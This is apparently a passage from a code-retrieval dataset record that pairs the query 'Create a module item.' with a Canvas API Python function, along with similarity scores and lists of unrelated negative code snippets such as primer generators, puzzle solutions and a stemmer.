['Vabij[\"cdij\"]'])\n assert(cl1.to_cpp() == ['( + 1.0 ) * Vabij[\"cdij\"];'])\n\n hl8 = HirataLine(lines[7])\n assert(set(hl8.free_indices.split()) == set(\"p3 p4 h1 h2\".split()))\n assert(hl8.summation_indices == ' h6 p5 ')\n assert(\n hl8.prefactors == [\n '+ 1.0 ',\n '- 1.0 * P( p3 p4 h2 h1 => p4 p3 h2 h1 ) ',\n '- 1.0 * P( p3 p4 h2 h1 => p3 p4 h1 h2 ) ',\n '+ 1.0 * P( p3 p4 h2 h1 => p4 p3 h1 h2 ) '\n ]\n )\n assert(\n hl8.postfactors ==\n ['Sum ( h6 p5 )', 't ( p5 p3 h6 h2 )', 'v ( h6 p4 h1 p5 )']\n )\n assert(str(hl8) == lines[7].replace('\\n', ''))\n cl8 = Cc4sLine(hl8)\n assert(set(cl8.free_indices.split()) == set([\"c\", \"d\", \"i\", \"j\"]))\n assert(cl8.summation_indices == \" n e \")\n assert(\n cl8.prefactors ==\n 
['+ 1.0 ',\n '- 1.0 * P( c d j i => d c j i ) ',\n '- 1.0 * P( c d j i => c d i j ) ',\n '+ 1.0 * P( c d j i => d c i j ) ']\n )\n assert(cl8.postfactors == ['Tabij[\"ecnj\"]', 'Viajb[\"ndie\"]'])\n assert(\n cl8.to_cpp() == [\n '( + 1.0 ) * Tabij[\"ecnj\"] * Viajb[\"ndie\"];',\n '( - 1.0 ) * Tabij[\"ednj\"] * Viajb[\"ncie\"];',\n '( - 1.0 ) * Tabij[\"ecni\"] * Viajb[\"ndje\"];',\n '( + 1.0 ) * Tabij[\"edni\"] * Viajb[\"ncje\"];'\n ]\n )", "def genPrimerPairs_3Ext(primer_length=20, anneal_length=10, GC_low=40, GC_high=60):\n\n print('Primers for 3\\' extension half-asstemers')\n\n\n forwTemplate5_3 = GenOligoGC(primer_length,GC_low, GC_high)\n \"\"\"re.match checks if the first 2 Nuc are GC in the forward and backwards direction\"\"\"\n while not (re.match(\"[GC]{2}\",str(forwTemplate5_3)) and\n re.match(\"[GC]{2}\", str(forwTemplate5_3[::-1])) and\n re.match(\"[GC]{2}\", str(forwTemplate5_3[8:10]))):\n\n forwTemplate5_3 = GenOligoGC(primer_length,GC_low, GC_high)\n\n forwTemp3_5 = forwTemplate5_3[::-1]\n forwPrimer5_3 = forwTemp3_5.complement()\n print(f\"Template Seq 3\\' - > 5\\': {forwTemp3_5}\")\n print(f\"ForwPrimer Seq 5\\' - > 3\\': {forwPrimer5_3}\")\n\n forwPrimer_L10 = forwPrimer5_3[10:]\n print(f\"Last 10 Nucleotides of forward primer: {forwPrimer_L10}\")\n\n revPrimer_L10 = GenOligoGC(10,GC_low, GC_high)\n while not re.match(\"[GC]{2}\",str(revPrimer_L10[::-1])):\n revPrimer_L10 = GenOligoGC(10,GC_low, GC_high)\n\n \"\"\"First 10 Nuc of rev primer must be identical to last 10 Nuc of forward Primer\"\"\"\n revPrimer5_3 = forwPrimer_L10 + revPrimer_L10\n\n print(f\"RevPrimer Seq 5\\' - > 3\\': {revPrimer5_3}\")\n\n return forwPrimer5_3, revPrimer5_3", "def part_two(puzzle: Puzzle) -> typing.Optional[typing.Union[str, int]]:\n for number_one, number_two in itertools.combinations(puzzle[\"set\"], 2):\n if (2020 - number_one - number_two) in puzzle[\"set\"]:\n return (2020 - number_one - number_two) * number_one * number_two", "def idealOpAmp():", "def common(self):", "def answer():\n for k in range(2,3000):\n for j in range(k-1,0,-1):\n pj, pk = P(j), P(k)\n #print( j, k, pj, pk )\n if isPent(pk-pj):\n #print( j, k, pj, pk, pk+pj, isPent(pk+pj), pk-pj )\n if isPent(pk+pj) and isPent(pk-pj):\n return pk-pj", "def bloqueio_2(tab,jog):\r\n jog*=-1\r\n return vitoria_1(tab,jog)", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def pulp_smash():", "def _optimise(self):\n pass", "def prob2(N1, N2, P1, P2):\n raise NotImplementedError(\"Problem 2 Incomplete\")", "def firstFunction(self):", "def REC_2s():\n return 2", "def solution(self):\n return [(\"simple 1\", 1.),\n (\"simple 2\", 1.),\n (\"simple 3\", 1.),\n (\"simple 4\", 1.),\n (\"simple 5\", 1.),\n (\"simple 10\", 1.),\n (\"simple 15\", 1.),\n (\"thai 1\", 1.),\n (\"thai 2\", 1.),\n (\"thai 3\", 1.),\n (\"thai 4\", 1.),\n (\"thai 5\", 1.),\n (\"thai 10\", 1.),\n (\"thai 15\", 1.),\n ]", "def part1a_2():\n mediumCRF = submission.LinearChainCRF( [\"-FEAT-\", \"-SIZE-\"],\n submission.binaryFeatureFunction,\n Counter({\n (\"-FEAT-\", \"-SIZE-\") : 0.8,\n (\"-SIZE-\", \"-FEAT-\") : 0.5,\n (\"-SIZE-\", \"-SIZE-\") : 1.,\n (\"-FEAT-\", \"-FEAT-\") : 1.,\n (\"-FEAT-\", \"Beautiful\") : 1.,\n (\"-SIZE-\", \"Beautiful\") : 0.5,\n (\"-FEAT-\", \"house\") : 1.,\n (\"-SIZE-\", \"house\") : 0.5,\n (\"-FEAT-\", \"2\") : 0.5,\n 
(\"-SIZE-\", \"2\") : 1.0,\n (\"-FEAT-\", \"bedroom\") : 0.5,\n (\"-SIZE-\", \"bedroom\") : 1.0,}) )\n moreExampleInputs = [\n \"This is a Beautiful 2 bedroom\".split(),\n \"2 bedroom Beautiful house\".split(),\n ]\n moreExampleTags = [\n ['-FEAT-', '-FEAT-', '-FEAT-', '-FEAT-', '-SIZE-', '-SIZE-'],\n ['-SIZE-', '-SIZE-', '-FEAT-', '-FEAT-']\n ]\n for xs, ys in zip(moreExampleInputs, moreExampleTags):\n ys_ = submission.computeViterbi(mediumCRF, xs)\n grader.requireIsEqual( ys, ys_ )", "def _regr_basic():", "def step2(self):\n\t\tif self.b[self.k - 1] == 'a':\n\t\t\tif self.ends(\"ational\"): self.r(\"ate\")\n\t\t\telif self.ends(\"tional\"): self.r(\"tion\")\n\t\telif self.b[self.k - 1] == 'c':\n\t\t\tif self.ends(\"enci\"):\t self.r(\"ence\")\n\t\t\telif self.ends(\"anci\"): self.r(\"ance\")\n\t\telif self.b[self.k - 1] == 'e':\n\t\t\tif self.ends(\"izer\"):\t self.r(\"ize\")\n\t\telif self.b[self.k - 1] == 'l':\n\t\t\tif self.ends(\"bli\"):\t self.r(\"ble\") # --DEPARTURE--\n\t\t\t# To match the published algorithm, replace this phrase with\n\t\t\t#\tif self.ends(\"abli\"):\t self.r(\"able\")\n\t\t\telif self.ends(\"alli\"): self.r(\"al\")\n\t\t\telif self.ends(\"entli\"): self.r(\"ent\")\n\t\t\telif self.ends(\"eli\"):\t self.r(\"e\")\n\t\t\telif self.ends(\"ousli\"): self.r(\"ous\")\n\t\telif self.b[self.k - 1] == 'o':\n\t\t\tif self.ends(\"ization\"): self.r(\"ize\")\n\t\t\telif self.ends(\"ation\"): self.r(\"ate\")\n\t\t\telif self.ends(\"ator\"): self.r(\"ate\")\n\t\telif self.b[self.k - 1] == 's':\n\t\t\tif self.ends(\"alism\"):\t self.r(\"al\")\n\t\t\telif self.ends(\"iveness\"): self.r(\"ive\")\n\t\t\telif self.ends(\"fulness\"): self.r(\"ful\")\n\t\t\telif self.ends(\"ousness\"): self.r(\"ous\")\n\t\telif self.b[self.k - 1] == 't':\n\t\t\tif self.ends(\"aliti\"):\t self.r(\"al\")\n\t\t\telif self.ends(\"iviti\"): self.r(\"ive\")\n\t\t\telif self.ends(\"biliti\"): self.r(\"ble\")\n\t\telif self.b[self.k - 1] == 'g': # --DEPARTURE--\n\t\t\tif self.ends(\"logi\"):\t self.r(\"log\")\n\t\t# To match the published algorithm, delete this phrase", "def merge_two_calls(self) -> None:", "def test_problem2():\n print('Testing problem2. 
The next line should be 18, 23536, 61, 5')\n print(problem2(4, 2), end=', ')\n print(problem2(105, 2), end=', ')\n print(problem2(2, 5), end=', ')\n print(problem2(2, 2))", "def regular(self):", "def part_5a():\n\n raise NotImplementedError", "def qst2(self):\n self.success = False", "def calculate(self):", "def genPrimerPairs_5Ext(primer_length=20, anneal_length=10, GC_low=40, GC_high=60):\n\n print('Primers for 5\\' extension half-asstemers')\n\n forwTemplate5_3 = GenOligoGC(primer_length,GC_low, GC_high)\n \"\"\"re.match checks if the first 2 Nuc are GC in the forward and backwards direction\"\"\"\n while not (re.match(\"[GC]{2}\",str(forwTemplate5_3)) and\n re.match(\"[GC]{2}\", str(forwTemplate5_3[::-1])) and\n re.match(\"[GC]{2}\", str(forwTemplate5_3[10:12]))):\n\n forwTemplate5_3 = GenOligoGC(primer_length,GC_low, GC_high)\n\n forwTemp3_5 = forwTemplate5_3[::-1]\n forwPrimer5_3 = forwTemp3_5.complement()\n print(f\"Template Seq 3\\' - > 5\\': {forwTemp3_5}\")\n print(f\"ForwPrimer Seq 5\\' - > 3\\': {forwPrimer5_3}\")\n\n forwPrimer_f10 = forwPrimer5_3[:10]\n print(f\"First 10 Nucleotides of forward primer: {forwPrimer_f10}\")\n\n revPrimer_f10 = GenOligoGC(10,GC_low, GC_high)\n while not re.match(\"[GC]{2}\",str(revPrimer_f10)):\n revPrimer_f10 = GenOligoGC(10,GC_low, GC_high)\n\n revPrimer5_3 = revPrimer_f10 + forwPrimer_f10\n\n print(f\"RevPrimer Seq 5\\' - > 3\\': {revPrimer5_3}\")\n\n return forwPrimer5_3, revPrimer5_3", "def f1_score(self):", "def part1a_0():\n xs = exampleInput\n ys = exampleTags\n ys_ = submission.computeViterbi(simpleCRF, xs)\n grader.requireIsEqual( ys, ys_ )", "def part1_2(puzzle_input):\n [initial_state_string, configurations] = puzzle_input.split('\\n\\n')\n initial_state = re.sub('initial state: ', '', initial_state_string)\n rules_arr = configurations.split('\\n')\n rules = [re.split(' => ', line) for line in rules_arr]\n rules = {t[0]: t[1] for t in rules}\n current_state = '..........' + initial_state + '...............................................................................................................................................'\n for i in range(100): # After 100th cycle, the only change is that there is a '#' that shifts right\n next_generation_string = \"\"\n for index, pot in enumerate(current_state):\n if index == 0:\n temp_string = '..' + current_state[:3]\n elif index == 1:\n temp_string = '.' + current_state[:4]\n elif index == len(current_state) - 2:\n temp_string = current_state[-4:] + '.'\n elif index == len(current_state) - 1:\n temp_string = current_state[-3:] + '..'\n else:\n temp_string = current_state[index-2:index+3]\n if temp_string in rules:\n next_generation_string += rules[temp_string]\n else:\n next_generation_string += pot\n current_state = next_generation_string\n\n # For part 1\n part1_sum = 0\n if i == 19:\n for index, pot in enumerate(current_state):\n if pot == '#':\n part1_sum += index - 10\n print(part1_sum)\n\n # Part 2\n part2_sum = 0\n for index, pot in enumerate(current_state):\n if pot == '#':\n part2_sum += index - 10 + 50000000000 - 100\n print(part2_sum)", "def project(self, X):", "def project(self, X):" ]
[ "0.6879843", "0.6871387", "0.6860534", "0.6821481", "0.6766025", "0.67570114", "0.6722933", "0.66447437", "0.6609891", "0.65726656", "0.6570282", "0.65633136", "0.6554844", "0.6482532", "0.6472665", "0.64377874", "0.6428559", "0.6427989", "0.63757336", "0.6357774", "0.63287115", "0.6279073", "0.627079", "0.62071586", "0.61873275", "0.60596913", "0.5997983", "0.5917516", "0.5905285", "0.5898481", "0.5859372", "0.58418256", "0.58359516", "0.5818848", "0.58050734", "0.5722754", "0.5722754", "0.5656766", "0.56442", "0.56397057", "0.56397057", "0.5633216", "0.5618579", "0.55983824", "0.5581739", "0.5581739", "0.55573875", "0.55573714", "0.55428886", "0.5534347", "0.5507896", "0.54758894", "0.54758894", "0.5471618", "0.54697347", "0.54694766", "0.54670966", "0.5462047", "0.54576105", "0.54424226", "0.5432521", "0.5393374", "0.5391384", "0.53845376", "0.53747326", "0.53693295", "0.5367425", "0.53660166", "0.5345747", "0.5344487", "0.53332794", "0.53249484", "0.53249305", "0.53240865", "0.5321835", "0.53210294", "0.53168565", "0.5313229", "0.53077155", "0.5306414", "0.5305692", "0.52984434", "0.5296285", "0.52954805", "0.5290965", "0.5290016", "0.52835226", "0.5282542", "0.5281662", "0.52752644", "0.52554893", "0.52527046", "0.5248542", "0.5239233", "0.52322066", "0.5230776", "0.52274984", "0.522059", "0.5219202", "0.5219202" ]
0.6043972
26
Create a module item.
def create_module_item(self, module_item, **kwargs): unrequired_types = ["ExternalUrl", "Page", "SubHeader"] if isinstance(module_item, dict) and "type" in module_item: # content_id is not required for unrequired_types if module_item["type"] in unrequired_types or "content_id" in module_item: kwargs["module_item"] = module_item else: raise RequiredFieldMissing( "Dictionary with key 'content_id' is required." ) else: raise RequiredFieldMissing("Dictionary with key 'type' is required.") response = self._requester.request( "POST", "courses/{}/modules/{}/items".format(self.course_id, self.id), _kwargs=combine_kwargs(**kwargs), ) module_item_json = response.json() module_item_json.update({"course_id": self.course_id}) return ModuleItem(self._requester, module_item_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _create_item(request):\r\n usage_key = UsageKey.from_string(request.json['parent_locator'])\r\n category = request.json['category']\r\n\r\n display_name = request.json.get('display_name')\r\n\r\n if not has_course_access(request.user, usage_key.course_key):\r\n raise PermissionDenied()\r\n\r\n parent = get_modulestore(category).get_item(usage_key)\r\n dest_usage_key = usage_key.replace(category=category, name=uuid4().hex)\r\n\r\n # get the metadata, display_name, and definition from the request\r\n metadata = {}\r\n data = None\r\n template_id = request.json.get('boilerplate')\r\n if template_id:\r\n clz = parent.runtime.load_block_type(category)\r\n if clz is not None:\r\n template = clz.get_template(template_id)\r\n if template is not None:\r\n metadata = template.get('metadata', {})\r\n data = template.get('data')\r\n\r\n if display_name is not None:\r\n metadata['display_name'] = display_name\r\n\r\n get_modulestore(category).create_and_save_xmodule(\r\n dest_usage_key,\r\n definition_data=data,\r\n metadata=metadata,\r\n system=parent.runtime,\r\n )\r\n\r\n # TODO replace w/ nicer accessor\r\n if not 'detached' in parent.runtime.load_block_type(category)._class_tags:\r\n parent.children.append(dest_usage_key)\r\n get_modulestore(parent.location).update_item(parent, request.user.id)\r\n\r\n return JsonResponse({\"locator\": unicode(dest_usage_key), \"courseKey\": unicode(dest_usage_key.course_key)})", "def _create_module(self, rootdir):\n name = 'module_' + rootdir.get_name()\n moduleobj = Module(name, rootdir)\n rootdir.set_module(moduleobj)\n self._modules[name] = moduleobj", "def create_module(cls, *args, **kwargs): # real signature unknown\n pass", "def create_module(cls, *args, **kwargs): # real signature unknown\n pass", "def create_item(self, user: User, **kwargs) -> None:", "def create_module(self, body: list, **kwargs):\n return ast.Module(body=body)", "def add_item(self):\n item = LibGen.create_item()\n if not self.item_exists(item.call_number):\n self.item_list[item.call_number] = item\n print(f\"Item({item.call_number}) bas been added.\")\n else:\n print(\"This item already exists.\")", "def createItem(name, description, category_id, image, user_id):\n i = Item(name=name, description=description, category_id=category_id,\n image=image, user_id=user_id, pub_date=datetime.utcnow())\n db_session.add(i)\n db_session.commit()\n return i", "def _createModuleObj(self):\n raise NotImplementedError(\"Implement in derived class.\")", "def add_item(self):\n item = models.Item(item_name=self.test_item,\n list_id=1,\n description=self.test_item_desc)\n item.add()", "def create_work_item(self):", "def _create_item(self, parent_location, category, display_name, **kwargs):\n return ItemFactory.create(\n parent_location=parent_location,\n category=category,\n display_name=display_name,\n publish_item=False,\n user_id=self.user.id,\n **kwargs\n )", "def test_create_item(self):\n item = self.item\n\n self.assertTrue(isinstance(item, Item))\n self.assertEqual(item.name, \"Test Item\")", "def _create_item(self, item_id: str, data: dict) -> Pipeline:\n return Pipeline(id=item_id, **data)", "def _create_module(name):\n module = new.module(name)\n sys.modules[name] = module\n return module", "def test_create_module_invalid(self):\n payload = {'name': ''}\n res = self.client.post(MODULES_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)", "def _create_item(self, category, name, data, metadata, parent_category, parent_name, draft=True, split=True):\r\n location 
= self.old_course_key.make_usage_key(category, name)\r\n if not draft or category in DIRECT_ONLY_CATEGORIES:\r\n mongo = self.old_mongo\r\n else:\r\n mongo = self.draft_mongo\r\n mongo.create_and_save_xmodule(location, data, metadata, self.runtime)\r\n if isinstance(data, basestring):\r\n fields = {'data': data}\r\n else:\r\n fields = data.copy()\r\n fields.update(metadata)\r\n if parent_name:\r\n # add child to parent in mongo\r\n parent_location = self.old_course_key.make_usage_key(parent_category, parent_name)\r\n if not draft or parent_category in DIRECT_ONLY_CATEGORIES:\r\n mongo = self.old_mongo\r\n else:\r\n mongo = self.draft_mongo\r\n parent = mongo.get_item(parent_location)\r\n parent.children.append(location)\r\n mongo.update_item(parent, self.userid)\r\n # create pointer for split\r\n course_or_parent_locator = BlockUsageLocator(\r\n course_key=self.split_course_key,\r\n block_type=parent_category,\r\n block_id=parent_name\r\n )\r\n else:\r\n course_or_parent_locator = self.split_course_key\r\n if split:\r\n self.split_mongo.create_item(course_or_parent_locator, category, self.userid, block_id=name, fields=fields)", "def create_item():\n #if not request.json:\n # abort(400)\n parser = reqparse.RequestParser()\n parser.add_argument('item_code', type=int, required=False, help=\"Item code missing\")\n parser.add_argument('item_name', type=str, required=True, help=\"Item name missing\")\n parser.add_argument('size', type=str, required=True, help=\"Size missing\")\n parser.add_argument('color', type=str, required=True, help=\"Color missing\")\n parser.add_argument('quality', type=str, required=True, help=\"Quality missing\")\n parser.add_argument('username', type=str, required=True, help=\"Username missing\")\n args = parser.parse_args(strict=True)\n user_code = get_user_code(args['username'])\n if user_code is None:\n return make_response(jsonify({'error': 'User does not exists'}), 400)\n new_item = dict(\n item_code = args['item_code'],\n item_name = args['item_name'],\n size_code = get_size_code( args['size']),\n color_code = get_color_code( args['color']),\n quality_code = get_quality_code( args['quality'])\n )\n try:\n u = models.Items(**new_item)\n db.session.add(u)\n db.session.commit()\n except sqlalchemy.exc.IntegrityError, e:\n return make_response(jsonify({'error': 'item code already exists.'}), 400)\n\n return make_response(jsonify({'success': True}))", "def create_item_command(cog_href: str, destination: str) -> None:\n item = stac.create_item(cog_href)\n\n item.save_object(dest_href=destination)", "def createItem(self, parentFolderId, name, description) :\n path = 'item'\n params = { 'folderId': parentFolderId,\n 'name': name,\n 'description': description }\n obj = self.sendRestRequest('POST', path, params)\n if '_id' in obj :\n return obj['_id']\n else :\n raise Exception('Error, expected the returned item object to have an \"_id\" field')", "def edit(self, **kwargs):\n response = self._requester.request(\n \"PUT\",\n \"courses/{}/modules/{}/items/{}\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def hfp_firmware_pack_item_add(handle, org_dn, hfp_name, hw_vendor, hw_model,\r\n type, version):\r\n\r\n from ucsmsdk.mometa.firmware.FirmwarePackItem import FirmwarePackItem\r\n\r\n dn = org_dn + \"/fw-host-pack-\" + hfp_name\r\n obj = handle.query_dn(dn)\r\n if obj is 
None:\r\n raise ValueError(\"HFP '%s' does not exist\" % dn)\r\n\r\n mo = FirmwarePackItem(hw_vendor=hw_vendor,\r\n hw_model=hw_model,\r\n type=type,\r\n version=version)\r\n handle.add_mo(mo)\r\n handle.commit()\r\n\r\n return mo", "def newModule(name, swipl):\n if isinstance(name, str):\n name = Atom(name, swipl)\n\n return swipl.PL_new_module(name.handle)", "def createItem(name, category, price, user_id):\n try:\n description = wikipedia.summary(name)\n except wikipedia.exceptions.DisambiguationError as e:\n description = wikipedia.summary(name + \" \" + category.name)\n\n i = Item(name=name, description=description,\n category_id=category.id, price=price, user_id=user_id)\n session.add(i)\n session.commit()\n print 'Item \"' + name + '\" added.'\n return i", "def create(cls):\n return BasketItem(code=str(uuid.uuid4()))", "def create_item(world: World, item_id: str, x: int, y: int, *args):\n item_id = ITEMS[item_id]\n if item_id == \"coin\":\n item = Coin()\n elif item_id == \"star\":\n item = Star()\n else:\n item = DroppedItem(item_id)\n\n world.add_item(item, x * BLOCK_SIZE, y * BLOCK_SIZE)", "def create_modules(self):\n self.nmos = ptx(width=self.nmos_size,\n mults=self.nmos_mults,\n tx_type=\"nmos\")\n self.add_mod(self.nmos)\n\n self.pmos = ptx(width=self.pmos_size,\n mults=self.pmos_mults,\n tx_type=\"pmos\")\n self.add_mod(self.pmos)", "def create(self, item_type, uuid):\n return self.write.create(item_type, uuid)", "def create_item(self, obj):\n logger.info('ItemProduct adding item initiated')\n try:\n with Transaction().start(DBNAME, 1) as transaction:\n unit, = self.ProductUom.search([('name', '=', obj['units'])])\n template = self.ProductTemplate()\n try:\n if self.Product.search([('code', '=', obj['id']), ('description', '=', 'Stock'),\n ('type', '=', 'goods')])[-1]:\n return False\n except Exception:\n pass\n template.category = self.ProductCategory.search([('name', '=', obj['category'])])[-1]\n template.default_uom = unit\n template.purchase_uom = unit\n template.type = 'goods'\n rate = Decimal(obj['rate'])\n cost = rate / 2\n template.name = obj['name']\n template.list_price = Decimal(rate)\n template.cost_price = Decimal(cost)\n template.purchasable = True\n template.account_expense = self.accounts['expense']\n template.account_receivable = self.accounts['receivable']\n template.save()\n # transaction.cursor.commit()\n product = self.Product()\n product.template = template\n product.code = obj['id']\n product.description = 'Stock'\n product.save()\n transaction.cursor.commit()\n return True\n except Exception:\n if settings.level == 10:\n logger.exception('raised exception')\n return False", "def test_create_module_successful(self):\n payload = {'name': 'Test Module'}\n self.client.post(MODULES_URL, payload)\n\n exists = Module.objects.filter(\n user=self.user,\n name=payload['name']\n ).exists()\n\n self.assertTrue(exists)", "def create_item(item: Item):\n coll_users = data_access.get_user_collection()\n coll_items = data_access.get_items_collection()\n\n if not item.users:\n raise HTTPException(status.HTTP_400_BAD_REQUEST,\n \"Empty user list not allowed.\")\n\n if not item.content:\n raise HTTPException(status.HTTP_400_BAD_REQUEST,\n \"No description / content given.\")\n\n for user_name in item.users:\n if coll_users.find_one({\"name\": user_name}) is None:\n raise HTTPException(status.HTTP_400_BAD_REQUEST,\n f\"User {user_name} not exists in the user list.\")\n\n item_dict = item.dict()\n item_dict[\"item_id\"] = uuid.uuid4()\n\n tm_now = 
datetime.datetime.now().isoformat()\n item_dict[\"status_change_date\"] = tm_now\n\n coll_items.insert_one(item_dict)", "def createItem(self, item):\r\n try:\r\n self.feed_handler.createItem(item.link, item.title, item.descr,\r\n item.source, item.channelURL)\r\n self.feed_passed = self.feed_passed + 1\r\n except Exception, ex: \r\n # Remove comment for detailed information on feed item created\r\n #print ex\r\n pass", "def create_item(self, parent, block):\r\n li = util.etree.SubElement(parent, 'li')\r\n self.parser.parseBlocks(li, [block])", "def delete(self, **kwargs):\n response = self._requester.request(\n \"DELETE\",\n \"courses/{}/modules/{}/items/{}\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def create(self):\n item = BasketItem.create()\n self._baskets[item.code] = item\n return item.code", "def _new_item(class_name=None):\n class_name = class_name or \"Folder\"\n return ElementTree.Element(\"Item\", attrib={ \"class\": class_name })", "def create_item():\n\n data = request.get_json()\n title = data.get(\"title\", None)\n description = data.get(\"description\", None)\n due_date = data.get(\"due_date\", None)\n list_id = data.get(\"list_id\", None)\n\n if title is None or list_id is None:\n return abort(400, description=f\"List ID and title cannot be null!\")\n\n list_to_append = ToDoList.query.filter(ToDoList.id == list_id).first()\n\n if list_to_append is None:\n return abort(404, description=f\"List ID {list_id} does not exist!\")\n\n if due_date is not None:\n try:\n due_date = datetime.datetime.strptime(due_date, DATE_FORMAT)\n except ValueError:\n return abort(400, description=f\"Date format must be YYYY-MM-DD HH:MM\")\n\n new_item = Task(\n title=title,\n description=description,\n status=\"pending\",\n due_date=due_date,\n list_id=list_id,\n )\n db.session.add(new_item)\n db.session.commit()\n\n return make_response(json.dumps(new_item.serialize()))", "def complete(self, **kwargs):\n response = self._requester.request(\n \"PUT\",\n \"courses/{}/modules/{}/items/{}/done\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def test_create_parented_item(self):\r\n locator = BlockUsageLocator(\r\n CourseLocator(org='testx', offering='GreekHero', branch='draft'),\r\n 'chapter', block_id='chapter2'\r\n )\r\n original = modulestore().get_item(locator)\r\n\r\n locator = BlockUsageLocator(\r\n CourseLocator(org='testx', offering='wonderful', branch='draft'), 'course', 'head23456'\r\n )\r\n premod_course = modulestore().get_course(locator.course_key)\r\n category = 'chapter'\r\n new_module = modulestore().create_item(\r\n locator, category, 'user123',\r\n fields={'display_name': 'new chapter'},\r\n definition_locator=original.definition_locator\r\n )\r\n # check that course version changed and course's previous is the other one\r\n self.assertNotEqual(new_module.location.version_guid, premod_course.location.version_guid)\r\n parent = modulestore().get_item(locator)\r\n self.assertIn(new_module.location.version_agnostic(), version_agnostic(parent.children))\r\n self.assertEqual(new_module.definition_locator.definition_id, original.definition_locator.definition_id)", "def 
create_items(sender, instance, **kwargs):\n if instance.item_id is None and instance.item is None:\n item = Item()\n if hasattr(instance, 'active'):\n item.active = getattr(instance, 'active')\n item.save()\n instance.item = item", "def create_eitem(self, new_document):\n eitem_cls = current_app_ils.eitem_record_cls\n eitem_json = self.json_data.get(\"_eitem\", None)\n if eitem_json:\n try:\n self._build_eitem_dict(eitem_json, new_document[\"pid\"])\n record_uuid = uuid.uuid4()\n with db.session.begin_nested():\n provider = EItemIdProvider.create(\n object_type=\"rec\",\n object_uuid=record_uuid,\n )\n\n eitem_json[\"pid\"] = provider.pid.pid_value\n self.created = eitem_cls.create(eitem_json, record_uuid)\n db.session.commit()\n return self.created\n except IlsValidationError as e:\n click.secho(\n \"Field: {}\".format(e.errors[0].res[\"field\"]), fg=\"red\"\n )\n click.secho(e.original_exception.message, fg=\"red\")\n db.session.rollback()\n raise e", "def new_module(name, doc=None):\n m = ModuleType(name, doc)\n m.__file__ = name + \".py\"\n sys.modules[name] = m\n return m", "def _createItem(self, rpcObject):\n item = ShowWidgetItem(rpcObject, self)\n return item", "def create_item(self, course_or_parent_loc, category, user_id=None, **kwargs):\r\n # find the store for the course\r\n course_id = getattr(course_or_parent_loc, 'course_key', course_or_parent_loc)\r\n store = self._get_modulestore_for_courseid(course_id)\r\n\r\n location = kwargs.pop('location', None)\r\n # invoke its create_item\r\n if isinstance(store, MongoModuleStore):\r\n block_id = kwargs.pop('block_id', getattr(location, 'name', uuid4().hex))\r\n parent_loc = course_or_parent_loc if isinstance(course_or_parent_loc, UsageKey) else None\r\n # must have a legitimate location, compute if appropriate\r\n if location is None:\r\n location = course_id.make_usage_key(category, block_id)\r\n # do the actual creation\r\n xblock = store.create_and_save_xmodule(location, **kwargs)\r\n # don't forget to attach to parent\r\n if parent_loc is not None and not 'detached' in xblock._class_tags:\r\n parent = store.get_item(parent_loc)\r\n parent.children.append(location)\r\n store.update_item(parent)\r\n elif isinstance(store, SplitMongoModuleStore):\r\n if not isinstance(course_or_parent_loc, (CourseLocator, BlockUsageLocator)):\r\n raise ValueError(u\"Cannot create a child of {} in split. 
Wrong repr.\".format(course_or_parent_loc))\r\n\r\n # split handles all the fields in one dict not separated by scope\r\n fields = kwargs.get('fields', {})\r\n fields.update(kwargs.pop('metadata', {}))\r\n fields.update(kwargs.pop('definition_data', {}))\r\n kwargs['fields'] = fields\r\n\r\n xblock = store.create_item(course_or_parent_loc, category, user_id, **kwargs)\r\n else:\r\n raise NotImplementedError(u\"Cannot create an item on store %s\" % store)\r\n\r\n return xblock", "def test_new_item(self):\n\n\t\titem_id = mock_item()[0]\n\t\tself.assertEqual(item_id, 1)", "def addToInventory(modList, item):\r\n modList.append(item)", "def newItem(self, nodeObject, icon):\n newItem = QtGui.QTreeWidgetItem()\n newItem.name = nodeObject.name\n newItem.label = nodeObject.label\n newItem.type = nodeObject.type\n newItem._object = nodeObject\n newItem._widget = MainTreeNode(self, newItem, icon)\n return newItem", "def newItem(\n self,\n name=UNSPECIFIED,\n availability=\"available\",\n quantity_amount=UNSPECIFIED,\n quantity_unit=UNSPECIFIED,\n resource_location_guid=UNSPECIFIED,\n extraParams={},\n ):\n import labstep.entities.resourceItem.repository as resourceItemRepository\n\n return resourceItemRepository.newResourceItem(\n self.__user__,\n name=name,\n resource_id=self.id,\n availability=availability,\n quantity_amount=quantity_amount,\n quantity_unit=quantity_unit,\n resource_location_guid=resource_location_guid,\n extraParams=extraParams,\n )", "def test_vault_create_new_vault_item(self):\n pass", "def create_menu_item(menu, label, func):\n item = wx.MenuItem(menu, -1, label)\n menu.Bind(wx.EVT_MENU, func, id=item.GetId())\n menu.Append(item)\n return item", "def add_item_definition():\n nonlocal guid\n nonlocal guid_stack\n nonlocal tree\n\n current_leaf_add(guid, {}, tree, guid_stack)\n guid_stack.append(guid)\n guid += 1\n\n # Wrapping this current_leaf_add is defensive coding so we don't\n # crash on malformed glm files.\n if len(full_token) > 1:\n # Do we have a clock/object or else an embedded configuration\n # object?\n if len(full_token) < 4:\n # Add the item definition.\n current_leaf_add(full_token[0], full_token[-2], tree,\n guid_stack)\n elif len(full_token) == 4:\n # We likely have an embedded/nested object.\n current_leaf_add('omfEmbeddedConfigObject',\n full_token[0] + ' ' +\n list_to_string(full_token), tree,\n guid_stack)\n else:\n # Something is wrong.\n raise UserWarning('Malformed GridLAB-D model. 
